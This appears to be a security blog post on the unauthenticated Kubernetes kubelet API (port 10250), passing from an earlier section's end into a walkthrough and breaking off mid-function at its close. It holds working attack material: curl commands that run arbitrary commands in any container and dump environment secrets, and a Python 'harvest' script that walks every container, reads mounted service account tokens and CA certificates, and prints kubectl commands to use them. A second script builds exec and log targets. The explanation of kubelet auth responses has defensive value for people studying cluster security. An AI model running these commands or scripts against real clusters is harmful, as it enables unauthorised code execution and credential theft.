<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">dr-xr-xr-x 12 root root 0 Dec 19 19:06 sys</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxrwxrwt 1 root root 4.0K Oct 18 13:57 tmp</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 3 root root 4.0K Sep 11 07:24 usr</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4.0K Sep 11 07:25 var</span><br />
<br />
For completeness, if you got the client certificate and key via the environment variables (written out to kublet.crt and kublet.key) the kubectl command would be something like this:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt </span><span style="font-family: "courier new" , "courier" , monospace;">--client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
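The whole walk above (list pods on the open kubelet, exec into each container, read the mounted service account token and ca.crt, find the API server from the pod's environment) is easy to automate. The following is an added example, not code from the original post: k8-node is a placeholder host name, SAMPLE_RUNNINGPODS is a constructed stand-in for what GET /runningpods/ returns, and canned_runner() returns constructed command output, so everything except the two network functions runs offline.<br />

```python
"""Automate the walk above: list running pods on the open kubelet, exec into each
container, pull the mounted service account token and ca.crt, and work out the API
server address from the pod's environment.  Added example, not code from the
original post: k8-node is a placeholder host, SAMPLE_RUNNINGPODS is a constructed
/runningpods/ response and canned_runner() returns constructed command output, so
everything except the two network functions runs offline."""
import json
import ssl
import sys
import urllib.parse
import urllib.request

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"

# Constructed: a trimmed v1 PodList shaped like the kubelet's /runningpods/ output.
SAMPLE_RUNNINGPODS = json.dumps({"kind": "PodList", "items": [
    {"metadata": {"name": "kube-dns-5b1234c4d5-4321", "namespace": "kube-system"},
     "spec": {"containers": [{"name": "kubedns"}, {"name": "dnsmasq"}]}},
    {"metadata": {"name": "web-7d9f", "namespace": "default"},
     "spec": {"containers": [{"name": "web"}]}},
]})

# Equivalent of curl -k: kubelet serving certs are normally self-signed.
INSECURE_CTX = ssl.create_default_context()
INSECURE_CTX.check_hostname = False
INSECURE_CTX.verify_mode = ssl.CERT_NONE

def list_containers(runningpods_json):
    """(namespace, pod, container) for every container in a /runningpods/ body."""
    triples = []
    for pod in json.loads(runningpods_json).get("items", []):
        meta = pod["metadata"]
        for c in pod.get("spec", {}).get("containers", []):
            triples.append((meta["namespace"], meta["name"], c["name"]))
    return triples

def run_url(node, ns, pod, container, port=10250):
    """The exec endpoint the curl commands above POST to."""
    return f"https://{node}:{port}/run/{ns}/{pod}/{container}"

def fetch_runningpods(node, port=10250, timeout=10):
    """Network call: GET /runningpods/."""
    url = f"https://{node}:{port}/runningpods/"
    with urllib.request.urlopen(url, context=INSECURE_CTX, timeout=timeout) as resp:
        return resp.read().decode()

def run_cmd(node, ns, pod, container, cmd, port=10250, timeout=10):
    """Network call: POST cmd=<cmd> to /run/...; a failed command comes back as HTTP 500."""
    body = urllib.parse.urlencode({"cmd": cmd}).encode()
    req = urllib.request.Request(run_url(node, ns, pod, container, port), data=body, method="POST")
    with urllib.request.urlopen(req, context=INSECURE_CTX, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")

def canned_runner(node, ns, pod, container, cmd):
    """Constructed stand-in for run_cmd(): the distroless 'web' container has no cat."""
    if container == "web":
        raise OSError("HTTP 500: executable file not found")
    if cmd == "env":
        return "PATH=/usr/bin\nKUBERNETES_PORT=tcp://10.10.10.10:443\nKUBERNETES_SERVICE_PORT=443\n"
    if cmd.endswith("/token"):
        return "eyJhbGciOiJSUzI1NiI.constructed.token\n"
    return "-----BEGIN CERTIFICATE-----\nconstructed\n-----END CERTIFICATE-----\n"

def parse_env(env_output):
    """Output of `env` -> dict."""
    env = {}
    for line in env_output.splitlines():
        key, sep, val = line.partition("=")
        if sep:
            env[key] = val
    return env

def api_server_from_env(env):
    """https://host:port of the API server from the KUBERNETES_* variables the kubelet injects."""
    if "KUBERNETES_SERVICE_HOST" in env:
        return "https://%s:%s" % (env["KUBERNETES_SERVICE_HOST"], env.get("KUBERNETES_SERVICE_PORT", "443"))
    if "KUBERNETES_PORT" in env:  # e.g. tcp://10.10.10.10:443
        return "https://" + env["KUBERNETES_PORT"].split("://", 1)[-1]
    return None

def harvest(node, runningpods_json=None, runner=run_cmd):
    """Token, ca.crt and API server from every container that yields them; exec failures are skipped."""
    if runningpods_json is None:
        runningpods_json = fetch_runningpods(node)
    hits = []
    for ns, pod, container in list_containers(runningpods_json):
        try:
            token = runner(node, ns, pod, container, f"cat {SA_DIR}/token").strip()
            ca = runner(node, ns, pod, container, f"cat {SA_DIR}/ca.crt")
            env = parse_env(runner(node, ns, pod, container, "env"))
        except Exception:
            continue  # no cat, no SA mount, or the kubelet refused the exec
        if token.startswith("eyJ"):  # service account tokens are JWTs
            hits.append({"ns": ns, "pod": pod, "container": container, "token": token,
                         "ca_crt": ca, "api_server": api_server_from_env(env)})
    return hits

if __name__ == "__main__":  # python3 harvest.py k8-node
    for hit in harvest(sys.argv[1]):
        open("ca.crt", "w").write(hit["ca_crt"])
        print(f"{hit['ns']}/{hit['pod']}/{hit['container']}: kubectl --server={hit['api_server']} "
              f"--certificate-authority=ca.crt --token={hit['token']} get pods --all-namespaces")
```

The runner is injectable so the walk can be exercised against canned output; against a real node, harvest(node) fetches /runningpods/ itself and each hit prints the kubectl invocation from the post. If KUBERNETES_SERVICE_HOST points at a 10. address you still need to run that kubectl from inside the cluster, exactly as described above.<br />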
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<b>Kubernetes: unauth kublet API 10250 basic code exec</b> (published 2019-01-16)<br />
Unauthenticated kubelet API access (10250)<br />
<br />
Most Kubernetes distributions now configure authentication and authorization on this port, but it is still possible to expose it inadvertently, and it is still pretty common to find kubelets running with the upstream defaults (<span style="font-family: "courier new" , "courier" , monospace;">--anonymous-auth=true</span> and <span style="font-family: "courier new" , "courier" , monospace;">--authorization-mode=AlwaysAllow</span>), which is what makes the API below usable with no credentials at all. (The "insecure port" is a different thing: that is the API server's plaintext listener on 8080, not the kubelet.)<br />
<br />
<br />
<div>
<div>
Anybody who can reach the kubelet port (10250) on such a node, even without a certificate, can execute any command inside any container scheduled there, via a POST to:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"># /run/%namespace%/%pod_name%/%container_name%</span></div>
<div>
<br /></div>
<div>
example:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=ls -la /"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">total 12</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 13 root root 148 Aug 26 11:31 .</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 13 root root 148 Aug 26 11:31 ..</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">-rwxr-xr-x 1 root root 0 Aug 26 11:31 .dockerenv</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 8192 May 5 22:22 bin</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 5 root root 380 Aug 26 11:31 dev</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 3 root root 135 Aug 26 11:31 etc</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 nobody nogroup 6 Mar 18 16:38 home</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 6 Apr 23 11:17 lib</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">dr-xr-xr-x 353 root root 0 Aug 26 07:14 proc</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 6 Mar 18 16:38 root</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">dr-xr-xr-x 13 root root 0 Aug 26 15:12 sys</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxrwxrwt 2 root root 6 Mar 18 16:38 tmp</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 4 root root 31 Apr 23 11:17 usr</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 5 root root 41 Aug 26 11:31 var</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Here is how to dump a container's environment variables (secrets are often injected this way, and it's common to find tokens and credentials for the cluster here):</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">$ curl -k -XPOST "https://k8s-node-1:10250/run/kube-system/&lt;podname&gt;/&lt;container-name&gt;" -d "cmd=env"</span></div>
<div>
<br /></div>
<div>
The list of all pods and containers scheduled on that worker node can be retrieved with either of the commands below (you need this output to fill in the namespace, pod and container names above):</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">$ curl -sk https://k8s-node-1:10250/runningpods/ | python -mjson.tool</span></div>
<div>
<br /></div>
<div>
or</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">$ curl --insecure https://k8s-node-1:10250/runningpods | jq</span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
Example 1:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">curl --insecure https://1.2.3.4:10250/runningpods | jq</span></div>
<div>
<br /></div>
<div>
Output:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Forbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)</span></div>
<div>
Anonymous requests get through authentication here, but the authorizer (normally <i>--authorization-mode=Webhook</i>, which asks the API server) denies <i>system:anonymous</i>. You get nothing further without a credential that is allowed <i>nodes/proxy</i>.</div>
<div>
<br /></div>
<div>
Example 2:</div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">curl --insecure https://1.2.3.4:10250/runningpods | jq</span></div>
<div>
<br /></div>
<div>
Output:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">Unauthorized</span></div>
<div>
Anonymous auth is disabled (<i>--anonymous-auth=false</i>): the request is rejected before authorization even runs, so you need a client certificate or a bearer token (for example a service account token recovered from a pod) to get any further.</div>
<div>
<br /></div>
<div>
Example 3 (anonymous auth enabled and authorization mode AlwaysAllow, i.e. fully open):</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">curl --insecure https://1.2.3.4:10250/runningpods | jq</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Output:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">{</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "kind": "PodList",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "apiVersion": "v1",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "metadata": {},</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "items": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "metadata": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-5b8bf6c4f4-k5n2g",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "generateName": "kube-dns-5b8bf6c4f4-",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "namespace": "kube-system",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "selfLink": "/api/v1/namespaces/kube-system/pods/kube-dns-5b8bf6c4f4-k5n2g",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "uid": "63438841-e43c-11e8-a104-42010a80038e",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "resourceVersion": "85366060",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "creationTimestamp": "2018-11-09T16:27:44Z",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "labels": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "k8s-app": "kube-dns",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "pod-template-hash": "1646927090"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "annotations": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "kubernetes.io/config.seen": "2018-11-09T16:27:44.990071791Z",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "kubernetes.io/config.source": "api",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "scheduler.alpha.kubernetes.io/critical-pod": ""</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "ownerReferences": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "apiVersion": "extensions/v1beta1",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "kind": "ReplicaSet",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-5b8bf6c4f4",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "uid": "633db9d4-e43c-11e8-a104-42010a80038e",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "controller": true</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> ]</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "spec": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "volumes": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-config",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "configMap": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "defaultMode": 420</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-token-xznw5",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "secret": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "secretName": "kube-dns-token-xznw5",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "defaultMode": 420</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> ],</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "containers": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "dnsmasq",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "image": "gcr.io/google-containers/k8s-dns-dnsmasq-nanny-amd64:1.14.10",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "args": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "-v=2",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "-logtostderr",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "-configDir=/etc/k8s/dns/dnsmasq-nanny",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "-restartDnsmasq=true",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "-k",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--cache-size=1000",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--no-negcache",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--log-facility=-",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--server=/cluster.local/127.0.0.1#10053",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--server=/in-addr.arpa/127.0.0.1#10053",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "--server=/ip6.arpa/127.0.0.1#10053"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> ],</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "ports": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "dns",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "containerPort": 53,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "protocol": "UDP"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "dns-tcp",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "containerPort": 53,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "protocol": "TCP"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> ],</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "resources": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "requests": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "cpu": "150m",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "memory": "20Mi"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "volumeMounts": [</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-config",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "mountPath": "/etc/k8s/dns/dnsmasq-nanny"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "name": "kube-dns-token-xznw5",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "readOnly": true,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> }</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> ],</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "livenessProbe": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "httpGet": {</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "path": "/healthcheck/dnsmasq",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "port": 10054,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "scheme": "HTTP"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "initialDelaySeconds": 60,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "timeoutSeconds": 5,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "periodSeconds": 10,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "successThreshold": 1,</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "failureThreshold": 5</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "terminationMessagePath": "/dev/termination-log",</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> "imagePullPolicy": "IfNotPresent"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> },</span></div>
</div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> --------SNIP---------</span></div>
<div>
<br /></div>
<div>
With the output of the runningpods command you have the three values you need to craft the code exec request: the <i>namespace</i>, the <i>pod name</i> and the <i>container name</i>:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">$ curl -k -XPOST "https://k8s-node-1:10250/run/&lt;namespace&gt;/&lt;podname&gt;/&lt;container-name&gt;" -d "cmd=env"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: inherit;">as an example:</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioplz0x3icSps02JND9nZk7bjEey9ojuoGs5bnBaOrbw2O0mk0IHvE-AfyUItv8MYAZV0XsVPqmkeFlb3qicr6jh2hL_zH3BNht0JHnp0lfxj0qqal431vmkc51rczQh2b6a9Ycn5rsys/s1600/namespace-name+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="676" data-original-width="1408" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioplz0x3icSps02JND9nZk7bjEey9ojuoGs5bnBaOrbw2O0mk0IHvE-AfyUItv8MYAZV0XsVPqmkeFlb3qicr6jh2hL_zH3BNht0JHnp0lfxj0qqal431vmkc51rczQh2b6a9Ycn5rsys/s400/namespace-name+2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKQ8yNcXo-oAiDWOGc28urTyNK4WVXKPpN2Le-j6E3UZsNoqoUy4lDSUD4hpL4EDdjKdRgNBR3C2-QEMbvZNCLeWK_DyylDNNuGFba6Bgr6buLg6fLWe1knMPPfR-FCYY1ieAoJta5Asw/s1600/container-name+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="572" data-original-width="1510" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKQ8yNcXo-oAiDWOGc28urTyNK4WVXKPpN2Le-j6E3UZsNoqoUy4lDSUD4hpL4EDdjKdRgNBR3C2-QEMbvZNCLeWK_DyylDNNuGFba6Bgr6buLg6fLWe1knMPPfR-FCYY1ieAoJta5Asw/s400/container-name+2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
leaves you with:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=ls -la /"</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">total 35264</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 .</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 ..</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">-rwxr-xr-x 1 root root 0 Nov 9 16:27 .dockerenv</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Nov 9 16:27 bin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 5 root root 380 Nov 9 16:27 dev</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">-rwxr-xr-x 1 root root 36047205 Apr 13 2018 dnsmasq-nanny</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 etc</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Jan 9 2018 home</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 5 root root 4096 Nov 9 16:27 lib</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 5 root root 4096 Nov 9 16:27 media</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Jan 9 2018 mnt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">dr-xr-xr-x 125 root root 0 Nov 9 16:27 proc</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwx------ 2 root root 4096 Jan 9 2018 root</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Jan 9 2018 run</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Nov 9 16:27 sbin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 2 root root 4096 Jan 9 2018 srv</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">dr-xr-xr-x 12 root root 0 Nov 9 16:27 sys</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxrwxrwt 1 root root 4096 Nov 9 17:00 tmp</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 7 root root 4096 Nov 9 16:27 usr</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 var</span></div>
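<div>
To tie the pieces of this post together, here is an added example (mine, not from the original post, kube-hunter or Kubernetes itself) that turns a <i>/runningpods/</i> response into the <i>/run</i> targets and classifies the three responses shown in Examples 1 to 3. The node name, the trimmed PodList and the sample responses in it are constructed for the demo; the URL patterns, the meaning of the 401/403 responses and the kubelet flags are the real ones. It also switches the curl invocation to <i>--data-urlencode</i> so a command containing spaces or shell characters reaches the kubelet intact, and it builds the matching <i>/containerLogs</i> URL from the same (namespace, pod, container) tuple, which is what the containerLogs post further down uses.</div>

```python
"""Kubelet port 10250 triage: classify the response, build /run and /containerLogs targets.

Added example; not from the original post. The node name, the trimmed PodList and the
sample responses below are constructed for the demo. Only the standard library is used.
"""
import json
import ssl
import urllib.error
import urllib.request
from urllib.parse import quote

# Constructed PodList, trimmed to the fields we need, modelled on the /runningpods/ output above.
SAMPLE_RUNNINGPODS = json.dumps({
    "kind": "PodList",
    "apiVersion": "v1",
    "metadata": {},
    "items": [
        {"metadata": {"name": "kube-dns-5b8bf6c4f4-k5n2g", "namespace": "kube-system"},
         "spec": {"containers": [{"name": "dnsmasq"}, {"name": "sidecar"}]}},
        {"metadata": {"name": "web-7d9f5c6d8b-abcde", "namespace": "default"},
         "spec": {"containers": [{"name": "web"}]}},
    ],
})


def classify_kubelet_response(status, body):
    """Say what a /runningpods/ response tells you about the kubelet's auth settings.

    401 "Unauthorized"                        : --anonymous-auth=false, need a cert or token.
    403 "Forbidden (user=system:anonymous ..)": anonymous authn ok, but the authorizer
                                                (Webhook mode) denied system:anonymous.
    200 PodList                               : anonymous auth plus AlwaysAllow, fully open.
    """
    if status == 401:
        return "anonymous-auth-disabled"
    if status == 403 and "system:anonymous" in body:
        return "authz-denied-anonymous"
    if status == 200:
        try:
            doc = json.loads(body)
        except ValueError:
            return "unexpected"
        if isinstance(doc, dict) and doc.get("kind") == "PodList":
            return "open"
    return "unexpected"


def targets_from_runningpods(body):
    """Return every (namespace, pod, container) tuple scheduled on the node."""
    doc = json.loads(body)
    targets = []
    for item in doc.get("items", []):
        meta = item.get("metadata", {})
        ns, pod = meta.get("namespace"), meta.get("name")
        for container in item.get("spec", {}).get("containers", []):
            targets.append((ns, pod, container.get("name")))
    return targets


def run_url(node, ns, pod, container):
    """POST target for command execution: /run/namespace/pod/container."""
    return f"https://{node}:10250/run/{quote(ns)}/{quote(pod)}/{quote(container)}"


def container_logs_url(node, ns, pod, container):
    """GET target for a container's stdout/stderr: /containerLogs/namespace/pod/container."""
    return f"https://{node}:10250/containerLogs/{quote(ns)}/{quote(pod)}/{quote(container)}"


def curl_commands(node, body, cmd="env"):
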